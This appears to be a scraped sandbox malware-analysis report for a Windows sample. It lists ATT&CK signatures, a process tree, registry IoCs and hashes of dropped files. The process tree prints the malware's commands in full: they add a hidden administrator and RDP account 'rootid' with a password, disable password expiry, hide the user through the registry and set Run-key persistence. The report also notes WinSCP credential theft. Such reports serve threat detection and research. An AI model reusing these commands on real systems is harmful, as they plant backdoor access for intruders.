f55d6bd5f13356eda64fae070a5eee1a080f06a0aa69bdd7e137496d88346be3

General

Target

dc6b98b9707c0922ab6a53b3efdd5dac_JaffaCakes118.exe
Size

199KB
MD5

dc6b98b9707c0922ab6a53b3efdd5dac
SHA1

a72e76fbd5dfa53b3d27ed9d9e6d194a085d7d0e
SHA256

f55d6bd5f13356eda64fae070a5eee1a080f06a0aa69bdd7e137496d88346be3
SHA512

04b730c73876fc89eb465ebc069ad1e1bdbfbf5d1654a4bb49457d87ec290dd1832a571dea47adabea0d3f3c0461f8ce70d10fe2e4a82cbb698fed254c5d269b
SSDEEP

3072:hegn0/CPJCVJx55PUw9B/kRdOm+OiSTW+EJ2Fm5KEUxR4:heT6PJKJTkrOm+jl+E/Q8

Score

9^/10

defense_evasion discovery lateral_movement persistence spyware stealer

Malware Config

Signatures

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098
Remote Service Session Hijacking: RDP Hijacking 1 TTPs 2 IoCs
Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.
lateral_movement

RDP Hijacking
T1563.002

Processes:

net.exenet1.exe

pid process

2680 net.exe
2628 net1.exe
Executes dropped EXE 4 IoCs

Processes:

new.exenew.exeihiwy.exeihiwy.exe

pid process

2636 new.exe
1852 new.exe
1508 ihiwy.exe
2336 ihiwy.exe

pid	process
2680	net.exe
2628	net1.exe

pid	process
2636	new.exe
1852	new.exe
1508	ihiwy.exe
2336	ihiwy.exe

Loads dropped DLL 5 IoCs

Processes:

dc6b98b9707c0922ab6a53b3efdd5dac_JaffaCakes118.exenew.exenew.exe

pid	process
2600	dc6b98b9707c0922ab6a53b3efdd5dac_JaffaCakes118.exe
2600	dc6b98b9707c0922ab6a53b3efdd5dac_JaffaCakes118.exe
2636	new.exe
1852	new.exe
1852	new.exe

Reads WinSCP keys stored on the system 2 TTPs
Tries to access WinSCP stored sessions.
spyware stealer

Data from Local System
T1005

Credentials in Registry
T1552.002

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

dc6b98b9707c0922ab6a53b3efdd5dac_JaffaCakes118.exeihiwy.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\disable_nasty_checks = "setx SEE_MASK_NOZONECHECKS 1"	dc6b98b9707c0922ab6a53b3efdd5dac_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Run\{412772B9-36CD-97F4-4B62-1E420B049685} = "C:\\Users\\Admin\\AppData\\Roaming\\Efat\\ihiwy.exe"	ihiwy.exe

Password Policy Discovery 1 TTPs
Attempt to access detailed information about the password policy used within an enterprise network.
discovery

Password Policy Discovery
T1201

Hide Artifacts: Hidden Users 1 TTPs 1 IoCs

defense_evasion

Hidden Users

T1564.002

Processes:

reg.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\rootid = "0"	reg.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

new.exeihiwy.exe

description pid process target process

PID 2636 set thread context of 1852 2636 new.exe new.exe
PID 1508 set thread context of 2336 1508 ihiwy.exe ihiwy.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

description	pid	process	target process
PID 2636 set thread context of 1852	2636	new.exe	new.exe
PID 1508 set thread context of 2336	1508	ihiwy.exe	ihiwy.exe

System Location Discovery: System Language Discovery 1 TTPs 20 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

new.exePING.EXEnet1.exenet1.exenet1.exenew.exeihiwy.execmd.execscript.execmd.exenet1.exenet.exedc6b98b9707c0922ab6a53b3efdd5dac_JaffaCakes118.exePING.EXEnet.exenet.exenet.exereg.exePING.EXEPING.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	new.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	new.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ihiwy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dc6b98b9707c0922ab6a53b3efdd5dac_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 4 IoCs
Adversaries may check for Internet connectivity on compromised systems.
discovery

Internet Connection Discovery
T1016.001

Processes:

PING.EXEPING.EXEPING.EXEPING.EXE

pid process

2728 PING.EXE
1796 PING.EXE
2640 PING.EXE
2804 PING.EXE

pid	process
2728	PING.EXE
1796	PING.EXE
2640	PING.EXE
2804	PING.EXE

Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

T1112

Processes:

cmd.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Privacy\CleanCookies = "0"	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Privacy	cmd.exe

NTFS ADS 1 IoCs

Processes:

WinMail.exe

description	ioc	process
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Local Folders\Inbox\00D63DCF-00000001.eml:OECustomProperty	WinMail.exe

Runs net.exe
Runs ping.exe 1 TTPs 4 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXEPING.EXEPING.EXE

pid process

1796 PING.EXE
2640 PING.EXE
2804 PING.EXE
2728 PING.EXE

pid	process
1796	PING.EXE
2640	PING.EXE
2804	PING.EXE
2728	PING.EXE

Suspicious behavior: EnumeratesProcesses 34 IoCs

Processes:

ihiwy.exe

pid	process
2336	ihiwy.exe
2336	ihiwy.exe
2336	ihiwy.exe
2336	ihiwy.exe
2336	ihiwy.exe
2336	ihiwy.exe
2336	ihiwy.exe
2336	ihiwy.exe
2336	ihiwy.exe
2336	ihiwy.exe
2336	ihiwy.exe
2336	ihiwy.exe
2336	ihiwy.exe
2336	ihiwy.exe
2336	ihiwy.exe
2336	ihiwy.exe
2336	ihiwy.exe
2336	ihiwy.exe
2336	ihiwy.exe
2336	ihiwy.exe
2336	ihiwy.exe
2336	ihiwy.exe
2336	ihiwy.exe
2336	ihiwy.exe
2336	ihiwy.exe
2336	ihiwy.exe
2336	ihiwy.exe
2336	ihiwy.exe
2336	ihiwy.exe
2336	ihiwy.exe
2336	ihiwy.exe
2336	ihiwy.exe
2336	ihiwy.exe
2336	ihiwy.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

new.execmd.exeWinMail.exe

description	pid	process
Token: SeSecurityPrivilege	1852	new.exe
Token: SeSecurityPrivilege	2328	cmd.exe
Token: SeSecurityPrivilege	2328	cmd.exe
Token: SeManageVolumePrivilege	1504	WinMail.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

WinMail.exe

pid process

1504 WinMail.exe

pid	process
1504	WinMail.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

dc6b98b9707c0922ab6a53b3efdd5dac_JaffaCakes118.execmd.exenet.exenet.exenet.exenet.exenew.exe

description	pid	process	target process
PID 2600 wrote to memory of 2328	2600	dc6b98b9707c0922ab6a53b3efdd5dac_JaffaCakes118.exe	cmd.exe
PID 2600 wrote to memory of 2328	2600	dc6b98b9707c0922ab6a53b3efdd5dac_JaffaCakes118.exe	cmd.exe
PID 2600 wrote to memory of 2328	2600	dc6b98b9707c0922ab6a53b3efdd5dac_JaffaCakes118.exe	cmd.exe
PID 2600 wrote to memory of 2328	2600	dc6b98b9707c0922ab6a53b3efdd5dac_JaffaCakes118.exe	cmd.exe
PID 2600 wrote to memory of 1564	2600	dc6b98b9707c0922ab6a53b3efdd5dac_JaffaCakes118.exe	cscript.exe
PID 2600 wrote to memory of 1564	2600	dc6b98b9707c0922ab6a53b3efdd5dac_JaffaCakes118.exe	cscript.exe
PID 2600 wrote to memory of 1564	2600	dc6b98b9707c0922ab6a53b3efdd5dac_JaffaCakes118.exe	cscript.exe
PID 2600 wrote to memory of 1564	2600	dc6b98b9707c0922ab6a53b3efdd5dac_JaffaCakes118.exe	cscript.exe
PID 2328 wrote to memory of 1796	2328	cmd.exe	PING.EXE
PID 2328 wrote to memory of 1796	2328	cmd.exe	PING.EXE
PID 2328 wrote to memory of 1796	2328	cmd.exe	PING.EXE
PID 2328 wrote to memory of 1796	2328	cmd.exe	PING.EXE
PID 2328 wrote to memory of 2640	2328	cmd.exe	PING.EXE
PID 2328 wrote to memory of 2640	2328	cmd.exe	PING.EXE
PID 2328 wrote to memory of 2640	2328	cmd.exe	PING.EXE
PID 2328 wrote to memory of 2640	2328	cmd.exe	PING.EXE
PID 2328 wrote to memory of 2804	2328	cmd.exe	PING.EXE
PID 2328 wrote to memory of 2804	2328	cmd.exe	PING.EXE
PID 2328 wrote to memory of 2804	2328	cmd.exe	PING.EXE
PID 2328 wrote to memory of 2804	2328	cmd.exe	PING.EXE
PID 2600 wrote to memory of 2792	2600	dc6b98b9707c0922ab6a53b3efdd5dac_JaffaCakes118.exe	net.exe
PID 2600 wrote to memory of 2792	2600	dc6b98b9707c0922ab6a53b3efdd5dac_JaffaCakes118.exe	net.exe
PID 2600 wrote to memory of 2792	2600	dc6b98b9707c0922ab6a53b3efdd5dac_JaffaCakes118.exe	net.exe
PID 2600 wrote to memory of 2792	2600	dc6b98b9707c0922ab6a53b3efdd5dac_JaffaCakes118.exe	net.exe
PID 2792 wrote to memory of 2796	2792	net.exe	net1.exe
PID 2792 wrote to memory of 2796	2792	net.exe	net1.exe
PID 2792 wrote to memory of 2796	2792	net.exe	net1.exe
PID 2792 wrote to memory of 2796	2792	net.exe	net1.exe
PID 2600 wrote to memory of 1856	2600	dc6b98b9707c0922ab6a53b3efdd5dac_JaffaCakes118.exe	net.exe
PID 2600 wrote to memory of 1856	2600	dc6b98b9707c0922ab6a53b3efdd5dac_JaffaCakes118.exe	net.exe
PID 2600 wrote to memory of 1856	2600	dc6b98b9707c0922ab6a53b3efdd5dac_JaffaCakes118.exe	net.exe
PID 2600 wrote to memory of 1856	2600	dc6b98b9707c0922ab6a53b3efdd5dac_JaffaCakes118.exe	net.exe
PID 1856 wrote to memory of 2164	1856	net.exe	net1.exe
PID 1856 wrote to memory of 2164	1856	net.exe	net1.exe
PID 1856 wrote to memory of 2164	1856	net.exe	net1.exe
PID 1856 wrote to memory of 2164	1856	net.exe	net1.exe
PID 2600 wrote to memory of 2680	2600	dc6b98b9707c0922ab6a53b3efdd5dac_JaffaCakes118.exe	net.exe
PID 2600 wrote to memory of 2680	2600	dc6b98b9707c0922ab6a53b3efdd5dac_JaffaCakes118.exe	net.exe
PID 2600 wrote to memory of 2680	2600	dc6b98b9707c0922ab6a53b3efdd5dac_JaffaCakes118.exe	net.exe
PID 2600 wrote to memory of 2680	2600	dc6b98b9707c0922ab6a53b3efdd5dac_JaffaCakes118.exe	net.exe
PID 2680 wrote to memory of 2628	2680	net.exe	net1.exe
PID 2680 wrote to memory of 2628	2680	net.exe	net1.exe
PID 2680 wrote to memory of 2628	2680	net.exe	net1.exe
PID 2680 wrote to memory of 2628	2680	net.exe	net1.exe
PID 2600 wrote to memory of 2524	2600	dc6b98b9707c0922ab6a53b3efdd5dac_JaffaCakes118.exe	net.exe
PID 2600 wrote to memory of 2524	2600	dc6b98b9707c0922ab6a53b3efdd5dac_JaffaCakes118.exe	net.exe
PID 2600 wrote to memory of 2524	2600	dc6b98b9707c0922ab6a53b3efdd5dac_JaffaCakes118.exe	net.exe
PID 2600 wrote to memory of 2524	2600	dc6b98b9707c0922ab6a53b3efdd5dac_JaffaCakes118.exe	net.exe
PID 2524 wrote to memory of 2532	2524	net.exe	net1.exe
PID 2524 wrote to memory of 2532	2524	net.exe	net1.exe
PID 2524 wrote to memory of 2532	2524	net.exe	net1.exe
PID 2524 wrote to memory of 2532	2524	net.exe	net1.exe
PID 2600 wrote to memory of 2588	2600	dc6b98b9707c0922ab6a53b3efdd5dac_JaffaCakes118.exe	reg.exe
PID 2600 wrote to memory of 2588	2600	dc6b98b9707c0922ab6a53b3efdd5dac_JaffaCakes118.exe	reg.exe
PID 2600 wrote to memory of 2588	2600	dc6b98b9707c0922ab6a53b3efdd5dac_JaffaCakes118.exe	reg.exe
PID 2600 wrote to memory of 2588	2600	dc6b98b9707c0922ab6a53b3efdd5dac_JaffaCakes118.exe	reg.exe
PID 2600 wrote to memory of 2636	2600	dc6b98b9707c0922ab6a53b3efdd5dac_JaffaCakes118.exe	new.exe
PID 2600 wrote to memory of 2636	2600	dc6b98b9707c0922ab6a53b3efdd5dac_JaffaCakes118.exe	new.exe
PID 2600 wrote to memory of 2636	2600	dc6b98b9707c0922ab6a53b3efdd5dac_JaffaCakes118.exe	new.exe
PID 2600 wrote to memory of 2636	2600	dc6b98b9707c0922ab6a53b3efdd5dac_JaffaCakes118.exe	new.exe
PID 2636 wrote to memory of 1852	2636	new.exe	new.exe
PID 2636 wrote to memory of 1852	2636	new.exe	new.exe
PID 2636 wrote to memory of 1852	2636	new.exe	new.exe
PID 2636 wrote to memory of 1852	2636	new.exe	new.exe

C:\Windows\system32\taskhost.exe
"taskhost.exe"
1⤵
PID:1064

C:\Windows\system32\Dwm.exe
"C:\Windows\system32\Dwm.exe"
1⤵
PID:1176

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1200

C:\Users\Admin\AppData\Local\Temp\dc6b98b9707c0922ab6a53b3efdd5dac_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\dc6b98b9707c0922ab6a53b3efdd5dac_JaffaCakes118.exe"
2⤵
- Loads dropped DLL
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2600

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\delme.bat" "
3⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2328

C:\Windows\SysWOW64\PING.EXE
ping localhost -n 3
4⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1796

C:\Windows\SysWOW64\PING.EXE
ping localhost -n 3
4⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2640

C:\Windows\SysWOW64\PING.EXE
ping localhost -n 3
4⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2804

C:\Windows\SysWOW64\PING.EXE
ping localhost -n 3
4⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2728

C:\Windows\SysWOW64\cscript.exe
cscript ldapdi.vbs
3⤵
- System Location Discovery: System Language Discovery
PID:1564

C:\Windows\SysWOW64\net.exe
C:\Windows\system32\net.exe user rootid Stormload0987 /add
3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2792

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user rootid Stormload0987 /add
4⤵
- System Location Discovery: System Language Discovery
PID:2796

C:\Windows\SysWOW64\net.exe
C:\Windows\system32\net.exe localgroup Administrators rootid /add
3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1856

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup Administrators rootid /add
4⤵
- System Location Discovery: System Language Discovery
PID:2164

C:\Windows\SysWOW64\net.exe
C:\Windows\system32\net.exe localgroup "Remote Desktop Users" rootid /add
3⤵
- Remote Service Session Hijacking: RDP Hijacking
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2680

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Remote Desktop Users" rootid /add
4⤵
- Remote Service Session Hijacking: RDP Hijacking
- System Location Discovery: System Language Discovery
PID:2628

C:\Windows\SysWOW64\net.exe
C:\Windows\system32\net.exe accounts /maxpwage:unlimited
3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2524

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 accounts /maxpwage:unlimited
4⤵
- System Location Discovery: System Language Discovery
PID:2532

C:\Windows\SysWOW64\reg.exe
C:\Windows\system32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v rootid /t REG_DWORD /d "00000000" /f
3⤵
- Hide Artifacts: Hidden Users
- System Location Discovery: System Language Discovery
PID:2588

C:\Users\Admin\AppData\Local\Temp\new.exe
new.exe
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2636

C:\Users\Admin\AppData\Local\Temp\new.exe
"C:\Users\Admin\AppData\Local\Temp\new.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1852

C:\Users\Admin\AppData\Roaming\Efat\ihiwy.exe
"C:\Users\Admin\AppData\Roaming\Efat\ihiwy.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:1508

C:\Users\Admin\AppData\Roaming\Efat\ihiwy.exe
"C:\Users\Admin\AppData\Roaming\Efat\ihiwy.exe"
6⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
PID:2336

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\tmpd9dcda1b.bat"
5⤵
- System Location Discovery: System Language Discovery
PID:1380

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:636

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-863964503-55797419931773024532050371194300208814757589051148936782-1517326982"
1⤵
PID:2432

C:\Program Files\Windows Mail\WinMail.exe
"C:\Program Files\Windows Mail\WinMail.exe" -Embedding
1⤵
- NTFS ADS
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1504

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
PID:2324

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
PID:2200

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
PID:2340

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
PID:900

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Account Manipulation

1

T1098

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Privilege Escalation

Account Manipulation

1

T1098

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Defense Evasion

Hide Artifacts

1

T1564

Hidden Users

Modify Registry

Credential Access

Unsecured Credentials

1

T1552

Credentials in Registry

1

T1552.002

Discovery

Password Policy Discovery

1

T1201

Permission Groups Discovery

1

T1069

Local Groups

1

T1069.001

Remote System Discovery

1

T1018

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

System Network Configuration Discovery

1

T1016

Internet Connection Discovery

1

T1016.001

Lateral Movement

Remote Service Session Hijacking

1

T1563

RDP Hijacking

1

T1563.002

Collection

Data from Local System

1

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\edb.log

Filesize
2.0MB

MD5
ebaa28a99398d1b361c936cc5f629919

SHA1
4bb29a47a2cce24dce26584d1d20f0620d9a619b

SHA256
ed9963801640a5343954e75974c354e58fb26f47d2c0f8329f1035f4f12afb2d

SHA512
fdab4fbac378f9b156f5267fdbd9a0a24b1158b189e55beb11dfe6555fcfadc86d9edae882f89b11377db0d0a11a9f584d0000cc59fbca9a6cebbe07e37431f3

Download Submit
C:\Users\Admin\AppData\Local\Temp\delme.bat

Filesize
150B

MD5
79c5d7541b20d04ec99e1f8439e67672

SHA1
76f2c7b4a0561aba3223c28751ad4d9e01f3f8b9

SHA256
0fd45eb16a2cc0b770f50ace3684c8c71da5160722bc723f5b9a75815622da53

SHA512
3f5fdd8a88b07e1e92df7605f20968db36f047f38a6773267825aee2f08ad3dae03195cfc8e8cc3d38040a0a217a1eab5a3666f70350f87fbbe42d0f6b323ad1

Download Submit
C:\Users\Admin\AppData\Local\Temp\ldapdi.vbs

Filesize
3KB

MD5
0fede1b4fdd2037be0a8504ce5223c86

SHA1
d452a239b50b57856f2a7118e34b8c4ff0f0f928

SHA256
1f2914b0cb85e44ebc8013bed0df3b7e012f3eca0215b437c8fb275fa0a10774

SHA512
f2d2177f33c221dec6d8a6c4c5c312ff504befd769b55d9501a0ec8c15f4ba5a1ae84ffac51fee766582dbebe42261df8558bef96ba310b93b0b3796216b7256

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpd9dcda1b.bat

Filesize
185B

MD5
4d17ef714a8c1eb5026690e76a6b3213

SHA1
edbfa2f7f1b2db300f6d07c6b34d4707bf00ad6e

SHA256
0282338a3e575a228be760fa1b3eb4d46c98cd9ff74df0c6ac6a36d8a1229685

SHA512
018a44366db97bc83298b5aa901c63d99b0b21e53db1cb091479e7828a510e3251742579b9bbc55a422927d47051c7ade91b634f563ede2606aa3ff5d9f156f6

Download Submit
C:\Users\Admin\AppData\Roaming\Abot\izko.mel

Filesize
323B

MD5
c7f58dcfa0835aead4234cf5d47c97d2

SHA1
9cd69d019a484a03172844aacbf1911dfab2e5a6

SHA256
39980d706e26007da73656c345140aedb2d54e4a29bdd2a4ba6a042e3445d32f

SHA512
56970b00df163991739539692a74ca7d46720af7862386fa713713e07650b455211e1631ffcdb646343be2ecbb43fd427251ebcca11347c047a53564d8779f8c

Download Submit
\??\PIPE\lsarpc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\Users\Admin\AppData\Local\Temp\new.exe

Filesize
128KB

MD5
7a46fa237294276499def1cfca60fafd

SHA1
ab979ba7f778efde6fdbcd80ffbcc745c2b00d1d

SHA256
c0117654fc16e455ecfbadbc9dcfb01c2de3124055ecfdd3ede54520607902bf

SHA512
7cf9f6b3c807995ccadc6d8b80e2a4db819e17383ea89420db794330e97dda7ca1ea9a089357853cbace07f23e0cf90a7a319ebf655ef56548a0c4a63b3d1be5

Download Submit
\Users\Admin\AppData\Roaming\Efat\ihiwy.exe

Filesize
128KB

MD5
7ff564cd6abf941a1593d03ba6499b55

SHA1
f79aea46ec44260a60abe545ee9039f1f0ea6b0c

SHA256
d194398e7906970bc378806f5ddafacee69fc56d7a35d8fdb453ab735626d615

SHA512
f96429be24f9ebaf0278ddcb35064e956120a3df378d3b570d6abc64771aba6ed1322b632d087aefe0df99391317eb4c3543712fc411ac3266733ec6ca12ee6e

Download Submit
memory/636-82-0x0000000001FF0000-0x0000000002017000-memory.dmp

Filesize
156KB

Download
memory/636-76-0x0000000001FF0000-0x0000000002017000-memory.dmp

Filesize
156KB

Download
memory/636-78-0x0000000001FF0000-0x0000000002017000-memory.dmp

Filesize
156KB

Download
memory/636-80-0x0000000001FF0000-0x0000000002017000-memory.dmp

Filesize
156KB

Download
memory/1064-44-0x0000000001F90000-0x0000000001FB7000-memory.dmp

Filesize
156KB

Download
memory/1064-46-0x0000000001F90000-0x0000000001FB7000-memory.dmp

Filesize
156KB

Download
memory/1064-52-0x0000000001F90000-0x0000000001FB7000-memory.dmp

Filesize
156KB

Download
memory/1064-48-0x0000000001F90000-0x0000000001FB7000-memory.dmp

Filesize
156KB

Download
memory/1064-50-0x0000000001F90000-0x0000000001FB7000-memory.dmp

Filesize
156KB

Download
memory/1176-56-0x0000000001EA0000-0x0000000001EC7000-memory.dmp

Filesize
156KB

Download
memory/1176-62-0x0000000001EA0000-0x0000000001EC7000-memory.dmp

Filesize
156KB

Download
memory/1176-60-0x0000000001EA0000-0x0000000001EC7000-memory.dmp

Filesize
156KB

Download
memory/1176-58-0x0000000001EA0000-0x0000000001EC7000-memory.dmp

Filesize
156KB

Download
memory/1200-66-0x0000000002A60000-0x0000000002A87000-memory.dmp

Filesize
156KB

Download
memory/1200-68-0x0000000002A60000-0x0000000002A87000-memory.dmp

Filesize
156KB

Download
memory/1200-70-0x0000000002A60000-0x0000000002A87000-memory.dmp

Filesize
156KB

Download
memory/1200-72-0x0000000002A60000-0x0000000002A87000-memory.dmp

Filesize
156KB

Download
memory/1852-42-0x0000000000400000-0x0000000000427000-memory.dmp

Filesize
156KB

Download
memory/1852-26-0x0000000000400000-0x0000000000427000-memory.dmp

Filesize
156KB

Download
memory/1852-27-0x0000000000400000-0x0000000000427000-memory.dmp

Filesize
156KB

Download
memory/1852-25-0x0000000000400000-0x0000000000427000-memory.dmp

Filesize
156KB

Download
memory/1852-23-0x0000000000400000-0x0000000000427000-memory.dmp

Filesize
156KB

Download
memory/2328-86-0x00000000001F0000-0x0000000000217000-memory.dmp

Filesize
156KB

Download
memory/2328-88-0x00000000001F0000-0x0000000000217000-memory.dmp

Filesize
156KB

Download
memory/2328-90-0x00000000001F0000-0x0000000000217000-memory.dmp

Filesize
156KB

Download
memory/2328-95-0x0000000000230000-0x0000000000231000-memory.dmp

Filesize
4KB

Download
memory/2328-97-0x0000000000230000-0x0000000000231000-memory.dmp

Filesize
4KB

Download
memory/2328-99-0x0000000000230000-0x0000000000231000-memory.dmp

Filesize
4KB

Download
memory/2328-92-0x00000000001F0000-0x0000000000217000-memory.dmp

Filesize
156KB

Download
memory/2328-94-0x00000000001F0000-0x0000000000217000-memory.dmp

Filesize
156KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads